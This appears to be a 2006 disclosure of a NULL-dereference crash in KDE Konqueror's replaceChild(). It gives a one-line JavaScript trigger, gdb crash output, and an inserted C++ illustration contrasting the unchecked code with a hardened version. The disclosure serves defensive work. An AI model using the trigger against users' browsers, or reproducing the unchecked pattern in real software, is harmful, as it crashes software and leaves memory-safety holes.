The following bug was tested on KDE 3.5.1 on a current Gentoo Linux system. Calling the replaceChild() method on almost any DOM element can result in a NULL dereference.
document.replaceChild(0);
Demonstration
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1231504512 (LWP 11418)]
0xb6552ca0 in DOM::Node::replaceChild () from /usr/kde/3.5/lib/libkhtml.so.4
(gdb) display /i $pc
1: x/i $pc 0xb6552ca0 <_ZN3DOM4Node12replaceChildERKS0_S2_+110>: testb $0x8,0x22(%edx)
(gdb) i r $edx
edx 0x0 0
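As an added illustration (not KHTML's code or the author's), here is a hypothetical C++ model of the bug class: a replaceChild() that reads a flag bit through the script-supplied newChild pointer before checking it, which is the shape of the faulting testb on a null %edx above, beside a hardened version that validates its arguments and returns a DOM exception code instead. The Node layout, the flag bit and the exception numbers are assumptions.

```cpp
#include <cstdint>

// Hypothetical model of a DOM node, not KHTML's DOM::Node; field names and
// the flag value are assumptions chosen to mirror the faulting flag test.
struct Node {
    uint32_t flags;
    Node *parent;
    Node *firstChild;
    Node *nextSibling;
};
enum { NODE_FLAG_BIT = 0x8 };                 // the bit "testb $0x8" checks
enum { DOM_OK = 0, HIERARCHY_REQUEST_ERR = 3, NOT_FOUND_ERR = 8 };

// Vulnerable shape (never called below): reads a flag through newChild
// before validating it, so replaceChild(0) faults on the first read.
bool replaceChildUnchecked(Node *self, Node *newChild, Node *oldChild) {
    bool flagged = (newChild->flags & NODE_FLAG_BIT) != 0;  // NULL deref
    return flagged && oldChild->parent == self;
}

// Hardened shape: validate every script-supplied pointer first and return a
// DOM exception code instead of dereferencing null.
int replaceChildChecked(Node *self, Node *newChild, Node *oldChild) {
    if (!self || !newChild || !oldChild) return NOT_FOUND_ERR;
    if (oldChild->parent != self) return NOT_FOUND_ERR;   // not our child
    if (newChild == self) return HIERARCHY_REQUEST_ERR;   // would cycle
    if (newChild->flags & NODE_FLAG_BIT) { /* flag-dependent bookkeeping */ }
    Node **link = &self->firstChild;   // parent check above guarantees a hit
    while (*link != oldChild) link = &(*link)->nextSibling;
    newChild->nextSibling = oldChild->nextSibling;
    newChild->parent = self;
    *link = newChild;
    oldChild->parent = oldChild->nextSibling = nullptr;
    return DOM_OK;
}

// The page's call shape, replaceChild(null, ...), is rejected with a code.
int demoNullNewChild() {
    Node parent{}, child{0, &parent, nullptr, nullptr};
    parent.firstChild = &child;
    return replaceChildChecked(&parent, nullptr, &child);
}

// A well-formed call still relinks the tree correctly.
bool demoValidReplace() {
    Node parent{}, a{0, &parent, nullptr, nullptr}, b{NODE_FLAG_BIT, nullptr, nullptr, nullptr};
    parent.firstChild = &a;
    return replaceChildChecked(&parent, &b, &a) == DOM_OK
        && parent.firstChild == &b && b.parent == &parent && !a.parent;
}
```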
This bug will be added to the OSVDB:
KDE Konqueror replaceChild() NULL Dereference
Friday, July 14, 2006